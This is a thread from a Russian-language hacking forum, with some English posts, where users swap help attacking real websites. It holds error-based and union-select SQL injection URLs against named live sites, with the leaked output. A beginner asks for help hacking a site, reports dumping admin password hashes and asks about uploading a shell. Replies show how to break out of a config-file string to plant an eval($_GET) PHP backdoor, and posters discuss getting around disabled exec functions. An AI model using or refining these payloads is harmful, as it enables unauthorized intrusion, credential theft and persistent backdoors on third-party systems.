Ваши вопросы по уязвимостям.

запрещены следующие функции php

Нужно запустить свою прогу (сплоит из под веба). подскажите плиз функции другии которые это могут сделать

 

это алиас shell_exec, а он disabled - так что не прокатит.

 

Помогите пожалуйста с инъекцией
http://www.easyhandwriting.com/catalog/product_info.php/products_id/12' or 1 group by concat((select customers_email_address from customers limit 0,1),floor(rand(0)*2)) having min(0) or 1 -- 1

 

эм... а из каких соображений там инъекция?

 

Подкиньте префиксы от таблиц.

 

Стандартные префиксы разные в каждой CMS.
Для DLE - dle_
Joomla - jos_
WordPress - wp_
И т. д.

 

http://www.easyhandwriting.com/catalog/product_info.php/products_id/12' or 1 group by concat((select customers_email_address from customers limit 0,1),floor(rand(0)*2)) having min(0) or 1 -- 1
1064 - You have an error in your SQL syntax

http://www.easyhandwriting.com/catalog/product_info.php/products_id/12' or 1 group by concat(user(),floor(rand(0)*2)) having min(0) or 1 -- 1
1062 - Duplicate entry 'easyhw@localhost1' for key 1

 

Третья ветка. Надо читать мануалы

Прокрути страницу вниз

 

Hi guys, I need help for hacking a site. Well first I sorry for that I'm writing on english (i will use and google translator for russian, but not sure if will be understandable). So I'm not good, well let's be honest, I'm noob in this (hacking, sql hacking etc). But after hours of trying I found a vuln (not sure), but I think is vuln.

Well is that a vuln ? And If it, can you help me with creating a sql injections ?


Now I will try to translate it to russian, and really sorry about that. i'm from Bulgaria and I should understand your language, but unfortunately I don't. And I think if I write it to bulgarian you wont understand it, so...

Translate from google translator:

Привет, ребята, мне нужна помощь для взлома сайта. Ну сначала я извиняюсь за это я пишу на английском языке (я буду использовать и Google Translator для России, но не уверен, если будет понятно). Так что я не очень хорошо, ну давайте будем честными, я нуб в этом (взлом, взлом SQL и т.д.). но после нескольких часов пытался я нашел vuln (не уверен), но я думаю, vuln.

Ну, что vuln? И если это, можете ли вы помочь мне в создании SQL-инъекций?

Теперь я постараюсь перевести его на русский, и действительно сожалею об этом. Я из Болгарии и я понимаю ваш язык, но к сожалению я не делаю. И я думаю, если я напишу его на болгарский вам не понять, так что ...

 

PM me link - i will try to help you

 

Hey I succeeded. Thanks for your time, and sorry again for that i'm writing in english.

edit: I have a question: how to use "update" in sql and is it possible ?

This is sql injection with select:

Code:

+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(schema_name),12 from information_schema.schemata--+-

how to update any table?

 

it's impossible

http://www.qatcom.com/yellowpages/view/-66854%27 - нету скули

 

So in my case, I can only read info... Well I can get admins hash passwords, but I can't login with them. Only can login with member and vip acc, but they are simple acc. There is something in mods and admins acc, may be cookie or something that I don;t have and when change my cookies with admin cookies it's logout me.... What can I do ? Is there chance to upload shell or to know what is different with acc, or any way to change someting ? :S

 

к index.php подключается include('includes/header.php');
строки из header.php

PHP:

<meta name="description" content="<?php echo $hc_cfg6;?>" />
    <meta name="keywords" content="<?php echo $hc_cfg5;?>" />

значения $hc_cfg6 и $hc_cfg5; берутся из таблицы в файле config.php

PHP:

$hc_cfg5 = "12345";
$hc_cfg6 = "123";

через админку в файл config.php удается прописать eval($_GET[e]);
результат

PHP:

<?php
***
$hc_cfg4 = "us.";
$hc_cfg5 = "12345";
$hc_cfg6 = "eval($_GET[e]);";
$hc_cfg7 = "1";
$hc_cfg8 = "0[country]";
***
?>

но ?e=phpinfo(); выводит пустую страницу.

(если прописать system($_GET['e']); весь сайт накрывается ошибкой
Parse error: syntax error, unexpected T_ENCAPSED_AND_WHITESPACE, expecting T_STRING or T_VARIABLE or T_NUM_STRING in /home/******/public_html/******/******/config.php on line 9

если прописать <?php eval($_GET[e]); ?> то в index.php выглядит так

PHP:

<meta name="description" content="<?php eval(); ?>" />

Подскажите пожалуйста где я ошибся? Или что делаю не так?

 

ты сначало убедись что пхп работает как надо, пропеши команду

если там где вставил , будет вывод 123, значит робит норм, встовляй тогда где тебе нужно вот этот код:

и вызываешь еко так "?e=phpinfo();"

 

Sloneny
Тебе нужно выйти за кавычки, иначе получается, что переменная $hc_cfg6 имеет тип string и содержит строку eval($_GET[e]); соответственно код выполняться не будет
Вписываешь что то вроде

PHP:

";eval($_GET[e]);"


в итоге получаешь выполнение кода

PHP:

$hc_cfg6 = "";eval($_GET[e]);"";


?e=phpinfo(); выведет phpinfo

 

Если админка фильтрует кавычки, то ты ничто не сделаешь, это банальная XSS. Если же нет, нужно просто выйти за переменную и вставить выполняемый код, как показал h00lyshit!(Если фильтруется двоеточие, то можно вставить код в саму переменную - ".код.").

Но при этом лучше использовать не GET и POST, а куки или HTTP заголовки. Так же возможно, что на стороне сервера запрещено выполнение этих функций.

При этом можно использовать что то типа $a($b) или вставлять нужный код напрямую.

 

echo "123"; просто в исходном становится
<meta name="description" content="echo '123';" />
больше нигде не выводит
" превращает в '
$hc_cfg6 = "echo '123';";
$hc_cfg6 = " ';eval($_GET[e]);' ";

видимо придется искать другие пути

 

считай, что ты можешь вывести значение любой переменной, от этого и пляши. Только вот переменные выводи так:

Code:

<?php
$a = "{$_SERVER['DOCUMENT_ROOT']}";
echo $a;
?>

а не

Code:

<?php
$a = "$_SERVER['DOCUMENT_ROOT']";
echo $a;
?>

 

А почему бы и нет? Только одинарные кавычки здесь не к чему.

Code:

<?php
$a = "$_SERVER[DOCUMENT_ROOT]";
echo $a;
?>

И фигурные скобки, и кавычки могут экранироваться